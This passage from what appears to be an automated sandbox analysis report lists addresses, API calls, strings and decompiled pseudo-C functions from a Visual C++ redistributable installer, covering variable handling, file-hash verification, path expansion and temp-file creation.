                                                                          0x000170a4
                                                                          0x000170a4
                                                                          0x000170ad
                                                                          0x000170b4
                                                                          0x000170b7
                                                                          0x000170b8
                                                                          0x000170b8
                                                                          0x000170bb
                                                                          0x000170bc
                                                                          0x000170bc
                                                                          0x000170c4
                                                                          0x000170d1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016ec1
                                                                          0x00016ec1
                                                                          0x00016ecf
                                                                          0x00016ed1
                                                                          0x00016ed3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016ed9
                                                                          0x00016edd
                                                                          0x00017036
                                                                          0x00017039
                                                                          0x0001703a
                                                                          0x0001703d
                                                                          0x00017040
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00017046
                                                                          0x00016ef1
                                                                          0x00016ef3
                                                                          0x00016ef5
                                                                          0x0001707e
                                                                          0x0001708a
                                                                          0x0001708a
                                                                          0x0001708b
                                                                          0x00000000
                                                                          0x00017091
                                                                          0x00016f09
                                                                          0x00016f0b
                                                                          0x00016f0d
                                                                          0x00017077
                                                                          0x00000000
                                                                          0x00017077
                                                                          0x00016f16
                                                                          0x00016f16
                                                                          0x00016f19
                                                                          0x00016ff4
                                                                          0x00017002
                                                                          0x00017004
                                                                          0x00017006
                                                                          0x00017070
                                                                          0x00000000
                                                                          0x00017070
                                                                          0x0001700f
                                                                          0x00017027
                                                                          0x00017029
                                                                          0x0001702b
                                                                          0x00017069
                                                                          0x00000000
                                                                          0x00017069
                                                                          0x00017031
                                                                          0x00000000
                                                                          0x00017031
                                                                          0x00016f1f
                                                                          0x00016f1f
                                                                          0x00016f22
                                                                          0x00016fca
                                                                          0x00016fcc
                                                                          0x00016fce
                                                                          0x0001704f
                                                                          0x0001704f
                                                                          0x00000000
                                                                          0x0001704f
                                                                          0x00016fdf
                                                                          0x00016fe1
                                                                          0x00016fe3
                                                                          0x00017048
                                                                          0x00017048
                                                                          0x00000000
                                                                          0x00017048
                                                                          0x00016fe7
                                                                          0x00016fe8
                                                                          0x00016feb
                                                                          0x00016feb
                                                                          0x00016fee
                                                                          0x00016fef
                                                                          0x00016fef
                                                                          0x00016fef
                                                                          0x00000000
                                                                          0x00016feb
                                                                          0x00016f28
                                                                          0x00016f28
                                                                          0x00016f2b
                                                                          0x00016f86
                                                                          0x00016f88
                                                                          0x00016f8a
                                                                          0x00017062
                                                                          0x00000000
                                                                          0x00017062
                                                                          0x00016f9e
                                                                          0x00016fa0
                                                                          0x00016fa2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016fa8
                                                                          0x00016fac
                                                                          0x00016fb1
                                                                          0x00016fb6
                                                                          0x00016fb6
                                                                          0x00000000
                                                                          0x00016fac
                                                                          0x00016f2d
                                                                          0x00016f30
                                                                          0x00017056
                                                                          0x0001705b
                                                                          0x00000000
                                                                          0x0001705b
                                                                          0x00016f44
                                                                          0x00016f46
                                                                          0x00016f48
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016f5d
                                                                          0x00016f5f
                                                                          0x00016f61
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00016f69
                                                                          0x00016f6a
                                                                          0x00016f6d
                                                                          0x00016f6d
                                                                          0x00016f70
                                                                          0x00016f71
                                                                          0x00016f71
                                                                          0x00016f71
                                                                          0x00000000
                                                                          0x00016f76
                                                                          0x00017085
                                                                          0x00000000
                                                                          0x00017085
                                                                          0x00016ea9
                                                                          0x00000000

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00016E89
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00017095
                                                                          Strings
                                                                          • Failed to set variable., xrefs: 00017069
                                                                          • Failed to read variable name., xrefs: 0001707E
                                                                          • Failed to set variable value., xrefs: 00017048
                                                                          • Failed to read variable included flag., xrefs: 00017085
                                                                          • Failed to read variable value type., xrefs: 00017077
                                                                          • Failed to read variable count., xrefs: 00016EA9
                                                                          • Failed to read variable value as number., xrefs: 0001704F
                                                                          • Failed to read variable literal flag., xrefs: 00017070
                                                                          • Unsupported variable type., xrefs: 0001705B
                                                                          • Failed to read variable value as string., xrefs: 00017062
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                                          • API String ID: 3168844106-528957463
                                                                          • Opcode ID: 6938e45f1578c35279d9016505ed263d630e338ab36a99781e7bc493276b0c88
                                                                          • Instruction ID: c2402a06339a1789ab2d4af56c2326dc7177bb440f4d5e1292a9a76de143da16
                                                                          • Opcode Fuzzy Hash: 6938e45f1578c35279d9016505ed263d630e338ab36a99781e7bc493276b0c88
                                                                          • Instruction Fuzzy Hash: 9E71A272C0561AFBDF22DEA4CC05EEFBBB8EB08710F104166FA04A6151D732DE958B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000291F7 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 60%
                                                                          			E000291F7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				void* _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v52;
				intOrPtr _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				char _v92;
				signed int _v100;
				void* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				void* _t69;
				short* _t72;
				signed short _t74;
				char* _t88;
				signed short _t90;
				signed short _t100;
				void* _t104;
				void* _t106;
				signed int* _t107;
				signed short _t108;
				intOrPtr _t109;
				signed int _t111;
				void* _t118;
				void* _t119;
				void* _t122;
				signed int _t141;

				_t118 = __edx;
				_t64 =  *0x7a008; // 0xfbf51acb
				_v8 = _t64 ^ _t141;
				_t109 = _a12;
				_v44 = _a8;
				_v40 = _t109;
				E0003F670(_t119,  &_v92, 0, 0x30);
				_v24 = 0xaac56b;
				_v20 = 0x11d0cd44;
				_v32 = 0;
				_v36 = 0;
				_t111 = 9;
				_t69 = memset( &_v128, 0, _t111 << 2);
				_v28 = _t69;
				_t122 = _t69;
				_v16 = 0xc000c28c;
				_v12 = 0xee95c24f;
				if(E000121A5( &_v32, _a8, _t69) >= 0) {
					_t72 = _v32;
					while(0 !=  *_t72) {
						 *_t72 =  *_t72 + 0x20;
						_t72 = _t72 + 2;
					}
					_push(0);
					_push(0);
					_push( &_v28);
					_push(_t109);
					L0004F45C();
					_t74 = GetLastError();
					if(_t74 != 0x7a) {
						if(_t74 == 0) {
							goto L11;
						} else {
							_t137 =  <=  ? _t74 : _t74 & 0x0000ffff | 0x80070000;
							_t104 = 0x80004005;
							_t128 =  >=  ? 0x80004005 :  <=  ? _t74 : _t74 & 0x0000ffff | 0x80070000;
							_push(_t128);
							_push(0x778);
							goto L8;
						}
					} else {
						_t106 = E000138D4(_v28, 1);
						_push(0);
						_t122 = _t106;
						_t107 =  &_v28;
						_push(_t122);
						_push(_t107);
						_push(_t109);
						L0004F45C();
						if(_t107 != 0) {
							L11:
							_t110 = 1 + _v28 * 2;
							if(E00011EDE( &_v36, 1 + _v28 * 2) >= 0) {
								if(E000126EE(0, _t122, _v28, _v36, _t110) >= 0) {
									_v92 = 0x30;
									_v68 =  &_v128;
									_v100 = _v28;
									_v108 = _v40;
									_v116 = _v36;
									_v112 = _v32;
									_t110 = 2;
									_v80 = _t110;
									_v72 = _t110;
									_v64 = 1;
									_v52 = 0x80;
									_v128 = 0x24;
									_v104 = _t122;
									_v120 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 8));
									_push( &_v92);
									_t88 =  &_v24;
									_push(_t88);
									_push(0xffffffff);
									L0004F42C();
									_t128 = _t88;
									if(_t88 == 0) {
										L18:
										_v64 = _t110;
										_push( &_v92);
										_t90 =  &_v24;
										_push(_t90);
										_push(0xffffffff);
										L0004F42C();
										if(_t90 != 0) {
											_t131 =  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
											_t128 =  >=  ? 0x80004005 :  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
											E000137D3(0x80004005, "cache.cpp", 0x7a3, _t128);
											_push("Could not close verify handle.");
											goto L20;
										}
									} else {
										_v52 = _v52 | 0x00001000;
										_push( &_v92);
										_t100 =  &_v24;
										_push(_t100);
										_push(0xffffffff);
										L0004F42C();
										if(_t100 == 0) {
											goto L18;
										} else {
											_t134 =  <=  ? _t100 : _t100 & 0x0000ffff | 0x80070000;
											_t128 =  >=  ? 0x80004005 :  <=  ? _t100 : _t100 & 0x0000ffff | 0x80070000;
											E000137D3(0x80004005, "cache.cpp", 0x79d,  >=  ? 0x80004005 :  <=  ? _t100 : _t100 & 0x0000ffff | 0x80070000);
											E0005012F( >=  ? 0x80004005 :  <=  ? _t100 : _t100 & 0x0000ffff | 0x80070000, "Could not verify file %ls.", _v44);
										}
									}
								} else {
									_push("Failed to encode file hash.");
									goto L20;
								}
							} else {
								_push("Failed to allocate string.");
								goto L20;
							}
						} else {
							_t108 = GetLastError();
							_t140 =  <=  ? _t108 : _t108 & 0x0000ffff | 0x80070000;
							_t104 = 0x80004005;
							_t128 =  >=  ? 0x80004005 :  <=  ? _t108 : _t108 & 0x0000ffff | 0x80070000;
							_push(_t128);
							_push(0x773);
							L8:
							_push("cache.cpp");
							E000137D3(_t104);
							_push("Failed to get file hash.");
							goto L20;
						}
					}
				} else {
					_push("Failed to allocate memory");
					L20:
					_push(_t128);
					E0005012F();
				}
				if(_v32 != 0) {
					E000554EF(_v32);
				}
				if(_v36 != 0) {
					E000554EF(_v36);
				}
				if(_t122 != 0) {
					E00013999(_t122);
				}
				return E0003DE36(_t110, _v8 ^ _t141, _t118, _t122, _t128);
			}















































                                                                          0x000291f7
                                                                          0x000291fd
                                                                          0x00029204
                                                                          0x00029208
                                                                          0x00029218
                                                                          0x0002921b
                                                                          0x0002921e
                                                                          0x00029226
                                                                          0x0002922f
                                                                          0x00029239
                                                                          0x0002923c
                                                                          0x00029241
                                                                          0x00029242
                                                                          0x00029245
                                                                          0x00029248
                                                                          0x0002924e
                                                                          0x00029256
                                                                          0x00029266
                                                                          0x00029272
                                                                          0x0002927e
                                                                          0x00029277
                                                                          0x0002927b
                                                                          0x0002927b
                                                                          0x00029285
                                                                          0x00029286
                                                                          0x0002928a
                                                                          0x0002928b
                                                                          0x0002928c
                                                                          0x00029297
                                                                          0x0002929c
                                                                          0x000292f1
                                                                          0x00000000
                                                                          0x000292f3
                                                                          0x000292fe
                                                                          0x00029301
                                                                          0x00029308
                                                                          0x0002930b
                                                                          0x0002930c
                                                                          0x00000000
                                                                          0x0002930c
                                                                          0x0002929e
                                                                          0x000292a3
                                                                          0x000292a8
                                                                          0x000292aa
                                                                          0x000292ac
                                                                          0x000292af
                                                                          0x000292b0
                                                                          0x000292b1
                                                                          0x000292b2
                                                                          0x000292b9
                                                                          0x00029313
                                                                          0x00029316
                                                                          0x0002932b
                                                                          0x00029348
                                                                          0x00029357
                                                                          0x0002935e
                                                                          0x00029364
                                                                          0x0002936a
                                                                          0x00029370
                                                                          0x00029376
                                                                          0x0002937e
                                                                          0x0002937f
                                                                          0x00029385
                                                                          0x00029388
                                                                          0x0002938f
                                                                          0x00029396
                                                                          0x0002939d
                                                                          0x000293a3
                                                                          0x000293a9
                                                                          0x000293aa
                                                                          0x000293ad
                                                                          0x000293ae
                                                                          0x000293b0
                                                                          0x000293b5
                                                                          0x000293b9
                                                                          0x00029410
                                                                          0x00029413
                                                                          0x00029416
                                                                          0x00029417
                                                                          0x0002941a
                                                                          0x0002941b
                                                                          0x0002941d
                                                                          0x00029424
                                                                          0x00029431
                                                                          0x0002943b
                                                                          0x00029449
                                                                          0x0002944e
                                                                          0x00000000
                                                                          0x0002944e
                                                                          0x000293bb
                                                                          0x000293bb
                                                                          0x000293c5
                                                                          0x000293c6
                                                                          0x000293c9
                                                                          0x000293ca
                                                                          0x000293cc
                                                                          0x000293d3
                                                                          0x00000000
                                                                          0x000293d5
                                                                          0x000293e0
                                                                          0x000293ea
                                                                          0x000293f8
                                                                          0x00029406
                                                                          0x0002940b
                                                                          0x000293d3
                                                                          0x0002934a
                                                                          0x0002934a
                                                                          0x00000000
                                                                          0x0002934a
                                                                          0x0002932d
                                                                          0x0002932d
                                                                          0x00000000
                                                                          0x0002932d
                                                                          0x000292bb
                                                                          0x000292bb
                                                                          0x000292c8
                                                                          0x000292cb
                                                                          0x000292d2
                                                                          0x000292d5
                                                                          0x000292d6
                                                                          0x000292db
                                                                          0x000292db
                                                                          0x000292e0
                                                                          0x000292e5
                                                                          0x00000000
                                                                          0x000292e5
                                                                          0x000292b9
                                                                          0x00029268
                                                                          0x00029268
                                                                          0x00029453
                                                                          0x00029453
                                                                          0x00029454
                                                                          0x0002945a
                                                                          0x0002945f
                                                                          0x00029464
                                                                          0x00029464
                                                                          0x0002946d
                                                                          0x00029472
                                                                          0x00029472
                                                                          0x00029479
                                                                          0x0002947c
                                                                          0x0002947c
                                                                          0x00029493

                                                                          APIs
                                                                          • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00029297
                                                                          • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 000292BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: $$0$@Met$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                                          • API String ID: 1452528299-3882969970
                                                                          • Opcode ID: a13163b078864bf3ce65fa9291716d837a8ac6ecf649b6916af19da8d47f10b7
                                                                          • Instruction ID: 4b2d04bf594d85e6907e07a4e580d3cd1222acd1ffdffe2be3856a68be63f5be
                                                                          • Opcode Fuzzy Hash: a13163b078864bf3ce65fa9291716d837a8ac6ecf649b6916af19da8d47f10b7
                                                                          • Instruction Fuzzy Hash: 907152B1D00229ABDB21DBE8DC41FEFB7F8AF08710F110126E905FB291E77499458BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00013083 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 206COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 85%
                                                                          			E00013083(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _t49;
				long _t57;
				void* _t63;
				signed short _t65;
				signed short _t66;
				long _t69;
				signed short _t77;
				signed short _t78;
				WCHAR* _t79;
				long _t81;
				long _t84;
				long _t85;
				long _t87;
				void* _t88;

				_t79 = _a8;
				_t49 = 0;
				_v12 = _v12 & 0;
				_t81 = 0;
				_v8 = 0;
				_v16 = 0;
				_t84 = 0x40;
				if((_a12 & 0x00000001) == 0) {
					L16:
					if((_a12 & 0x00000002) == 0) {
						_v8 = _v8 & 0x00000000;
						_v12 = _t49;
						goto L30;
					} else {
						_a12 = _a12 & 0x00000000;
						_t83 =  !=  ? _t49 : _t79;
						_a8 =  !=  ? _t49 : _t79;
						_t85 =  >  ? _t81 : _t84;
						_t88 = E00011EDE( &_v12, _t85);
						if(_t88 >= 0) {
							_t57 = GetFullPathNameW(_a8, _t85, _v12,  &_a12);
							if(_t57 != 0) {
								if(_t85 >= _t57) {
									L26:
									if(_t57 <= 0x104) {
										L28:
										_t49 = _v12;
										L30:
										_t80 =  !=  ? _t49 : _t79;
										_t88 = E000121A5(_a4,  !=  ? _t49 : _t79, 0);
									} else {
										_t88 = E00013593( &_v12);
										if(_t88 >= 0) {
											goto L28;
										}
									}
								} else {
									_t34 = _t57 + 7; // 0x7
									_t87 =  <  ? _t57 : _t34;
									_t88 = E00011EDE( &_v12, _t87);
									if(_t88 >= 0) {
										_t57 = GetFullPathNameW(_a8, _t87, _v12,  &_a12);
										if(_t57 != 0) {
											if(_t87 >= _t57) {
												goto L26;
											} else {
												_t63 = 0x8007007a;
												_push(0x8007007a);
												_t88 = 0x8007007a;
												_push(0x149);
												goto L4;
											}
										} else {
											_t65 = GetLastError();
											_t91 =  <=  ? _t65 : _t65 & 0x0000ffff | 0x80070000;
											_t63 = 0x80004005;
											_t88 =  >=  ? 0x80004005 :  <=  ? _t65 : _t65 & 0x0000ffff | 0x80070000;
											_push(_t88);
											_push(0x144);
											goto L4;
										}
									}
								}
							} else {
								_t66 = GetLastError();
								_t94 =  <=  ? _t66 : _t66 & 0x0000ffff | 0x80070000;
								_t63 = 0x80004005;
								_t88 =  >=  ? 0x80004005 :  <=  ? _t66 : _t66 & 0x0000ffff | 0x80070000;
								_push(_t88);
								_push(0x139);
								goto L4;
							}
						}
					}
				} else {
					_v16 = _t84;
					_t88 = E00011EDE( &_v8, _t84);
					if(_t88 >= 0) {
						_t69 = ExpandEnvironmentStringsW(_t79, _v8, _v16);
						if(_t69 != 0) {
							_t81 = _v16;
							if(_t81 >= _t69) {
								L11:
								if(_t69 <= 0x104) {
									L15:
									_t49 = _v8;
									goto L16;
								} else {
									_t88 =  ==  ? 0 : E00013593( &_v8);
									if(_t88 >= 0) {
										_t88 = E0001275D(_v8,  &_v16);
										if(_t88 >= 0) {
											_t81 = _v16;
											goto L15;
										}
									}
								}
							} else {
								_v16 = _t69;
								_t88 = E00011EDE( &_v8, _t69);
								if(_t88 >= 0) {
									_t69 = ExpandEnvironmentStringsW(_t79, _v8, _v16);
									if(_t69 != 0) {
										_t81 = _v16;
										if(_t81 >= _t69) {
											goto L11;
										} else {
											_t63 = 0x8007007a;
											_push(0x8007007a);
											_t88 = 0x8007007a;
											_push(0x118);
											goto L4;
										}
									} else {
										_t77 = GetLastError();
										_t98 =  <=  ? _t77 : _t77 & 0x0000ffff | 0x80070000;
										_t63 = 0x80004005;
										_t88 =  >=  ? 0x80004005 :  <=  ? _t77 : _t77 & 0x0000ffff | 0x80070000;
										_push(_t88);
										_push(0x113);
										goto L4;
									}
								}
							}
						} else {
							_t78 = GetLastError();
							_t101 =  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
							_t63 = 0x80004005;
							_t88 =  >=  ? 0x80004005 :  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
							_push(_t88);
							_push(0x108);
							L4:
							_push("pathutil.cpp");
							E000137D3(_t63);
						}
					}
				}
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t88;
			}




















                                                                          0x0001308a
                                                                          0x0001308d
                                                                          0x0001308f
                                                                          0x00013092
                                                                          0x0001309c
                                                                          0x0001309f
                                                                          0x000130a2
                                                                          0x000130a3
                                                                          0x000131b0
                                                                          0x000131b4
                                                                          0x000132b1
                                                                          0x000132b5
                                                                          0x00000000
                                                                          0x000131ba
                                                                          0x000131ba
                                                                          0x000131c2
                                                                          0x000131ca
                                                                          0x000131cd
                                                                          0x000131d7
                                                                          0x000131db
                                                                          0x000131ec
                                                                          0x000131f4
                                                                          0x00013221
                                                                          0x00013296
                                                                          0x0001329b
                                                                          0x000132ac
                                                                          0x000132ac
                                                                          0x000132b8
                                                                          0x000132bc
                                                                          0x000132c8
                                                                          0x0001329d
                                                                          0x000132a6
                                                                          0x000132aa
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000132aa
                                                                          0x00013223
                                                                          0x00013228
                                                                          0x0001322b
                                                                          0x00013238
                                                                          0x0001323c
                                                                          0x0001324d
                                                                          0x00013255
                                                                          0x00013282
                                                                          0x00000000
                                                                          0x00013284
                                                                          0x00013284
                                                                          0x00013289
                                                                          0x0001328a
                                                                          0x0001328c
                                                                          0x00000000
                                                                          0x0001328c
                                                                          0x00013257
                                                                          0x00013257
                                                                          0x00013268
                                                                          0x0001326b
                                                                          0x00013272
                                                                          0x00013275
                                                                          0x00013276
                                                                          0x00000000
                                                                          0x00013276
                                                                          0x00013255
                                                                          0x0001323c
                                                                          0x000131f6
                                                                          0x000131f6
                                                                          0x00013207
                                                                          0x0001320a
                                                                          0x00013211
                                                                          0x00013214
                                                                          0x00013215
                                                                          0x00000000
                                                                          0x00013215
                                                                          0x000131f4
                                                                          0x000131db
                                                                          0x000130a9
                                                                          0x000130ad
                                                                          0x000130b6
                                                                          0x000130ba
                                                                          0x000130c7
                                                                          0x000130cf
                                                                          0x00013104
                                                                          0x00013109
                                                                          0x0001316f
                                                                          0x00013174
                                                                          0x000131ad
                                                                          0x000131ad
                                                                          0x00000000
                                                                          0x00013176
                                                                          0x00013189
                                                                          0x0001318e
                                                                          0x000131a0
                                                                          0x000131a4
                                                                          0x000131aa
                                                                          0x00000000
                                                                          0x000131aa
                                                                          0x000131a4
                                                                          0x0001318e
                                                                          0x0001310b
                                                                          0x0001310c
                                                                          0x00013118
                                                                          0x0001311c
                                                                          0x00013129
                                                                          0x00013131
                                                                          0x00013159
                                                                          0x0001315e
                                                                          0x00000000
                                                                          0x00013160
                                                                          0x00013160
                                                                          0x00013165
                                                                          0x00013166
                                                                          0x00013168
                                                                          0x00000000
                                                                          0x00013168
                                                                          0x00013133
                                                                          0x00013133
                                                                          0x00013144
                                                                          0x00013147
                                                                          0x0001314e
                                                                          0x00013151
                                                                          0x00013152
                                                                          0x00000000
                                                                          0x00013152
                                                                          0x00013131
                                                                          0x0001311c
                                                                          0x000130d1
                                                                          0x000130d1
                                                                          0x000130e2
                                                                          0x000130e5
                                                                          0x000130ec
                                                                          0x000130ef
                                                                          0x000130f0
                                                                          0x000130f5
                                                                          0x000130f5
                                                                          0x000130fa
                                                                          0x000130fa
                                                                          0x000130cf
                                                                          0x000130ba
                                                                          0x000132ce
                                                                          0x000132d3
                                                                          0x000132d3
                                                                          0x000132dc
                                                                          0x000132e1
                                                                          0x000132e1
                                                                          0x000132ee

                                                                          APIs
                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,00000040,00000000,00000000), ref: 000130C7
                                                                          • GetLastError.KERNEL32 ref: 000130D1
                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00013129
                                                                          • GetLastError.KERNEL32 ref: 00013133
                                                                          • GetFullPathNameW.KERNEL32(00000000,00000040,00000000,00000000,00000000,00000040,00000000,00000000), ref: 000131EC
                                                                          • GetLastError.KERNEL32 ref: 000131F6
                                                                          • GetFullPathNameW.KERNEL32(00000000,00000007,00000000,00000000,00000000,00000007), ref: 0001324D
                                                                          • GetLastError.KERNEL32 ref: 00013257
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                          • String ID: @Met$pathutil.cpp
                                                                          • API String ID: 1547313835-364970561
                                                                          • Opcode ID: 71874d130d99f66e38ee7f0116149dff1782e59e34d824cd6faf147065da2e1c
                                                                          • Instruction ID: 1c29808dc372ad2d3e3cabe56a18a6a919d005f9971ec3a9fabc52830b6de764
                                                                          • Opcode Fuzzy Hash: 71874d130d99f66e38ee7f0116149dff1782e59e34d824cd6faf147065da2e1c
                                                                          • Instruction Fuzzy Hash: F0619332E00729BBEF31AAA58C49BEF7AE8EF44751F114165ED05E7150E735DE808B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00012DE0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 198sleepfiletimeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E00012DE0(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, void** _a24) {
				signed int _v8;
				short _v528;
				struct _SYSTEMTIME _v544;
				char _v548;
				WCHAR* _v552;
				char _v556;
				signed int _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				void** _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				void* _t63;
				void* _t82;
				void** _t87;
				void* _t88;
				signed short _t89;
				void* _t90;
				signed short _t91;
				intOrPtr _t95;
				void* _t97;
				signed int _t102;
				void* _t106;
				intOrPtr* _t107;
				signed int _t115;
				void* _t116;
				void* _t117;

				_t97 = __ecx;
				_t49 =  *0x7a008; // 0xfbf51acb
				_v8 = _t49 ^ _t115;
				_t95 = _a8;
				_v560 = _a12;
				_t107 = _a4;
				_v564 = _a16;
				_v568 = _a20;
				_v572 = _a24;
				E0003F670(0,  &_v528, 0, 0x208);
				_v548 = 0;
				_v556 = 0;
				_t117 = _t116 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t106 =  &_v544 | 0xffffffff;
				_v552 = 0;
				if(_t107 == 0 ||  *_t107 == 0) {
					if(GetTempPathW(0x104,  &_v528) != 0) {
						_push( &_v548);
						_push(_t95);
						_push( &_v528);
						goto L6;
					}
					_t91 = GetLastError();
					_t114 =  <=  ? _t91 : _t91 & 0x0000ffff | 0x80070000;
					_t108 =  >=  ? 0x80004005 :  <=  ? _t91 : _t91 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "pathutil.cpp", 0x283,  >=  ? 0x80004005 :  <=  ? _t91 : _t91 & 0x0000ffff | 0x80070000);
					goto L24;
				} else {
					_push( &_v548);
					_push(_t95);
					_push(_t107);
					L6:
					_t63 = E00012D79(_t97);
					_t108 = _t63;
					if(_t63 < 0) {
						L24:
						if(_v552 != 0) {
							E000554EF(_v552);
						}
						if(_v556 != 0) {
							E000554EF(_v556);
						}
						if(_v548 != 0) {
							E000554EF(_v548);
						}
						return E0003DE36(_t95, _v8 ^ _t115, _t103, _t106, _t108);
					}
					if(E00013446(_t97, _v548,  &_v556) != 0) {
						L9:
						_t95 =  !=  ? _v560 : 0x5b524;
						while(1) {
							_v560 = _v560 & 0x00000000;
							GetLocalTime( &_v544);
							_t103 = ".";
							_push(_v564);
							_push(0x2e);
							_t74 =  !=  ? "." : 0x5b524;
							_push( !=  ? "." : 0x5b524);
							_push(_t95);
							_push(_v544.wSecond & 0x0000ffff);
							_push(_v544.wMinute & 0x0000ffff);
							_push(_v544.wHour & 0x0000ffff);
							_push(_v544.wDay & 0x0000ffff);
							_push(_v544.wMonth & 0x0000ffff);
							_push(_v544.wYear & 0x0000ffff);
							_t82 = E00011F20( &_v552, L"%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls", _v548);
							_t108 = _t82;
							_t117 = _t117 + 0x30;
							if(_t82 < 0) {
								break;
							}
							_t106 = CreateFileW(_v552, 0x40000000, 1, 0, 1, 0x80, 0);
							if(_t106 != 0xffffffff) {
								L18:
								_t86 = _v568;
								if(_v568 == 0) {
									L20:
									_t87 = _v572;
									if(_t87 != 0) {
										 *_t87 = _t106;
										_t106 = _t106 | 0xffffffff;
									}
									break;
								}
								_t88 = E000121A5(_t86, _v552, 0);
								_t108 = _t88;
								if(_t88 < 0) {
									break;
								}
								goto L20;
							}
							_t89 = GetLastError();
							if(_t89 == 0x50 || _t89 == 5) {
								Sleep(0x64);
								_t89 = 0;
								_t102 = 1;
							} else {
								_t102 = _v560;
							}
							_t108 =  <=  ? _t89 : _t89 & 0x0000ffff | 0x80070000;
